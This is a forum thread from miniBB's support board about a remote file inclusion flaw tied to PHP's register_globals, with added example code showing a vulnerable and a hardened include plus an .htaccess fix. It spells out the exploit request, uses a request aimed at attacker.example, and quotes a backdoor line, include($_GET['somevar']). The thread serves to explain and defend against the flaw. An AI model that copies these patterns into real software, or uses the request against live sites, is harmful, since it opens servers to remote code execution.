miniBB Support Forums / The Other

Vulnerable code... often upgrades... and other things you must know before installing open source

 
Author juju
Partaker
#1 | Posted: 28 Jun 2007 04:40 
Wow, nice code...

if(!isset($pathToFiles)) include('./setup_options.php');

include($pathToFiles.'img/'.$GLOBALS['dirname'].'/smdesc.php');

so all you have to do is make a request to addon_smilies.php?pathToFiles=someurl,
create an img/<dirname> directory containing a file smdesc.php, and we are in business.

I hope there is not much more code like this.

Author Paul
Lead Developer 
#2 | Posted: 28 Jun 2007 08:39 
juju

Study miniBB code more carefully and you will understand that you are wrong.

These lines are actually HOW we fixed the recently discovered vulnerability.

If you put a request like addon_smilies.php?pathToFiles=someurl all you will get is a "Fatal error."

http://minibb.org/addon_smilies.php?pathToFiles=something

Thus it worked previously ONLY if PHP's register_globals setting is ON. It's a known fact that even the PHP developers recommend turning this setting OFF, which is how it comes by default. So you are in 'biz' only if some clever admins have made their hosting server insecure.

I hope there is not much more code like this.

We hope everything like this was fixed in default miniBB a long time ago...
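
The two posts above disagree about what the quoted lines do, so here is an added example (not miniBB code, not from either poster) that makes the dependency concrete. It emulates what register_globals=On did to the `addon_smilies.php` pattern from post #1 and sets a hardened rewrite of the same lines beside it. The functions return the path that `include()` would be handed rather than calling `include()`, so the file is safe to run; the request values, the theme names `default`/`classic` and the `./` default are all constructed for the example.

```php
<?php
// Added example, not miniBB code: what register_globals=On did to the
// addon_smilies.php lines quoted in post #1, and a hardened rewrite beside it.

// Constructed request, standing in for
//   addon_smilies.php?pathToFiles=http://attacker.example/&dirname=x
$request = ['pathToFiles' => 'http://attacker.example/', 'dirname' => 'x'];

// register_globals=On (PHP's default before 4.2, setting removed in 5.4) turned
// every request parameter into a global variable before the script's first line.
function emulate_register_globals(array $request): void
{
    foreach ($request as $name => $value) {
        $GLOBALS[$name] = $value;
    }
}

// The pattern from post #1. Returns the path include() would receive instead of
// calling include(), so this file can be run without touching any real files.
function vulnerable_include_target(): string
{
    // With register_globals on, the attacker has already set $pathToFiles, so the
    // branch that loads setup_options.php (which should define it) is skipped.
    if (!isset($GLOBALS['pathToFiles'])) {
        $GLOBALS['pathToFiles'] = './';   // stands in for include('./setup_options.php')
    }
    // Both path components are now request-controlled; with allow_url_fopen on
    // this becomes a remote file inclusion.
    return $GLOBALS['pathToFiles'] . 'img/' . $GLOBALS['dirname'] . '/smdesc.php';
}

// Hardened version: the base path is set unconditionally in code (no reliance on
// a variable that may or may not already exist), and the only request-controlled
// piece, the theme directory name, must match a fixed list.
function hardened_include_target(string $dirname): ?string
{
    $pathToFiles   = __DIR__ . '/';          // never "only if not already set"
    $allowedThemes = ['default', 'classic']; // assumed theme directories for the example
    if (!in_array($dirname, $allowedThemes, true)) {
        return null;                         // unknown theme: include nothing at all
    }
    return $pathToFiles . 'img/' . $dirname . '/smdesc.php';
}

emulate_register_globals($request);
echo 'vulnerable target: ', vulnerable_include_target(), "\n";
var_dump(hardened_include_target($request['dirname'])); // rejected: not a known theme
var_dump(hardened_include_target('default'));           // a path under this directory
```

Run it with `php` on the command line. The vulnerable function hands `include()` the attacker's URL because the `isset()` guard is satisfied by the request itself; the hardened function cannot, whatever register_globals is set to, because nothing from the request reaches the path except a name that has already been matched against the list.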

Author juju
Partaker
#3 | Posted: 28 Jun 2007 23:28 
I've been in zis 'biz' since 1999, so turning off globals is a feature I can't afford. A lot of clients have old software not compatible with this.

Author Paul
Lead Developer 
#4 | Posted: 29 Jun 2007 02:58 
A lot of clients have old software not compatible with this

- that only means this software is written in an unprofessional manner. Who cares? Continue to use old and buggy software because the budget doesn't allow fixing it, and the bugfixes based on this setting will never end...

Author juju
Partaker
#5 | Posted: 4 Jul 2007 04:14 
Unfortunately, using your software was a budget decision, and only because of this board my server got hacked 4 times since 2004. Now I can afford a migration to a paid board; however, I do not have an import script, so I'm stuck...

Author Paul
Lead Developer 
#6 | Posted: 4 Jul 2007 04:24 
and only because of this board my server got hacked 4 times since 2004

- not only because of this software, but because of the insecure server settings on your side, I must say.

Installing open source programs, you are always at risk. I wonder how many times you would have been hacked since 2004 if you had installed vBulletin (paid) or phpBB (free), boards which have had tens if not hundreds of holes by this time.

In general, all patches and security fixes are released by our team immediately after they are discovered. If you do not follow our news and do not update your software in time - who cares? It is your fault. What we have on minibbtest is a version with even admin access open; despite that, it has still never been hacked, not just because the newest release is always installed there, but also because the server has normal security settings which make a lot of sense.

Now, instead of making a business offer and ordering a conversion script, which would cost you not more than $100 I suppose, you are whining and screaming, as is usual for an unsatisfied free software user who wants everything at zero cost, and it seems your huge experience since 1999 didn't improve the quality of your business at all.

Arghh... postings like yours always make me mad. Sorry, that was emotional. The choice is in your hands. Do not blame us if you are not sure of yourself.

Author juju
Partaker
#7 | Posted: 4 Jul 2007 04:40 
Installing open source programs, you are always at risk. I wonder how many times you would have been hacked since 2004 if you had installed vBulletin (paid) or phpBB (free), boards which have had tens if not hundreds of holes by this time.

This is true. That's why I tried your software. However, I moved your software and all other potentially insecure software to a separate server. I do have backups, and if someone hacks it I can put everything back. Some servers have SELinux on and globals off, others don't. That depends on when that server was set up. Some people are running hundreds of sites and they don't care to update them. Making a new software version incompatible with an old one reminds me of Microsoft, and this is what PHP did.
Unfortunately my site used to be a PR5 or 6, and that made it vulnerable to any new attack. Removing the version from the credits was a huge security gain, however indirect.
Having a line like this:
if(isset($somevar)) include($somevar);
reminds me of some scripts which add this as a backdoor, and it works well with globals off if you change it to
if(isset($_GET['somevar'])) include($_GET['somevar']);
Sometimes I wonder if this wasn't the intention, because it is way too simple. So this is the reason I posted: because of the way too simple way of access, not the hole itself.

Author Paul
Lead Developer 
#8 | Posted: 4 Jul 2007 04:51 
Sorry, I understood only the first paragraph and can't get the idea of how the "code lines" could be related to miniBB. In our software, we have no backdoors, no hidden spies, etc. I can give a personal warranty that this software does just what it has been designed for.

The security issues we have from time to time are MOSTLY related to the register_globals setting and improper input validation. We are all human, and part of the script was written in the era when we had just started to develop miniBB (for example, the long-living Smilies addon, which has been fixed recently, has code programmed in 2002). We are not making "the holes" on purpose.

I also can't understand how the PHP version or PageRank could be involved in the security issues. Great that you have removed the version of the software (which has also been done by us some time ago); however, PHP has always had a register_globals setting and it is possible to turn it off for any version. If you are using Linux servers with Apache, I wonder why not simply set register_globals=OFF using .htaccess for the separate folder where just your miniBB forums are stored (leaving the other, older scripts vulnerable).

The solution to secure the software using existing tools is simple... even simpler than making claims ;-)
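
The per-directory approach suggested in post #8, written out as an added example (not from the original thread or the miniBB project). It assumes Apache with PHP running as a module and a forum directory such as /public_html/forum/; the path is an assumption for the example.

```apache
# .htaccess placed in the forum directory only (assumed: /public_html/forum/),
# so the older scripts elsewhere on the host keep the global setting they need.
#
# php_flag is provided by mod_php, so it is only honoured when PHP runs as an
# Apache module and the vhost permits it (AllowOverride Options or All). Under
# CGI/FastCGI PHP the directive is ignored and register_globals must be set in
# php.ini (or the pool configuration) instead. The setting was removed in
# PHP 5.4, where this line has no effect because the behaviour is gone.
php_flag register_globals Off
```

Check that it took effect rather than trusting the file: drop a script containing `<?php phpinfo(); ?>` into that directory, load it once, confirm that register_globals shows Off in the Local Value column, and delete the script again. If the value did not change, the directive was ignored (CGI/FastCGI, or AllowOverride too restrictive) and the script is still running with the setting the server gave it.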

Author tom322
Active Member
#9 | Posted: 4 Jul 2007 11:57 
Unfortunately, using your software was a budget decision, and only because of this board my server got hacked 4 times since 2004.
I would first complain to the hosting company (actually, first to yourself if you don't have the latest version installed).

I host a dozen or so websites with 10+ different hosts. One day I got a site hacked (the site was not related to miniBB software at all; it was a simple HTML site). Actually, it wasn't hacked to do direct harm to the site: the hacker just SOMEHOW managed to upload a folder containing his whole site onto my site! In public_html there was his folder, american-banking/ (it was used as a separate phishing site). Anyway, the host hadn't even realized that; when I emailed them, they said not to worry and only advised changing my cPanel password.

So in many cases it is the hosting company's fault, and unless you find the security holes yourself, don't count on them.
